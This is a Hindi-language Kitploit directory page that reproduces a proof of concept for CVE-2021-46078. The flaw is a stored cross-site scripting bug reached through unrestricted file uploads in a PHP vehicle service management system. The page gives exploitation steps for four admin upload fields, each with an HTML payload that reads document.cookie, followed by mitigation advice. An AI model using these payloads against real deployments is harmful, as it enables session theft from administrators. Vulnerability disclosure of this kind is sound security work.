Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting — CVE-2021-46078 - Sourcecodester Vehicle Service Management System 1.0 में एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग भेद्यता उत्पन्न होती है। | Kitploit
उपकरण/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-46078 - Sourcecodester Vehicle Service Management System 1.0 में एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग भेद्यता उत्पन्न होती है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2021-46078

शोषण शीर्षक: Vehicle Service Management System - 'एकाधिक' फ़ाइल अपलोड संग्रहीत क्रॉस-साइट स्क्रिप्टिंग की ओर ले जाता है

शोषण लेखक: SANU P.L

CVE: CVE-2021-46078

CVSS: 4.8 मध्यम

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

विवरण:

Sourcecodester Vehicle Service Management System 1.0 में एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे संग्रहीत क्रॉस-साइट स्क्रिप्टिंग भेद्यता उत्पन्न होती है।

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

शोषण:

  1. प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. My Account अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=user

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
  2. My Account अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. अवतार छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

शोषण:

  1. प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. User List अनुभाग पर जाएँ और Create New बटन पर क्लिक करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
  2. Create New User Page में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल ब्राउज़ करें।
  3. Save बटन पर क्लिक करें।
  4. अवतार छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

शोषण:

  1. प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और System Logo में html फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. System Logo छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

शोषण:

  1. प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और Website Cover में html फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. Website Cover छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।

प्रभाव:

एक हमलावर कई एंडपॉइंट्स पर दुर्भावनापूर्ण फ़ाइल अपलोड कर सकता है, जिससे संग्रहीत क्रॉस-साइट स्क्रिप्टिंग उत्पन्न होती है।

शमन:

निम्नलिखित लागू करने की अनुशंसा की जाती है:

  • व्हाइट-लिस्ट फ़िल्टर के बिना फ़ाइल नाम और उसके एक्सटेंशन को कभी सीधे स्वीकार न करें।
  • यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो यह अत्यधिक अनुशंसित है कि फ़ाइल नाम और एक्सटेंशन के लिए केवल अल्फा-न्यूमेरिक वर्ण और केवल एक डॉट को इनपुट के रूप में स्वीकार करें।
  • सेवा से वंचित (DoS) हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
  • अपलोड की गई निर्देशिका में कोई "execute" अनुमति नहीं होनी चाहिए।
  • केवल क्लाइंट-साइड सत्यापन पर निर्भर न रहें।
टूल डाउनलोड करें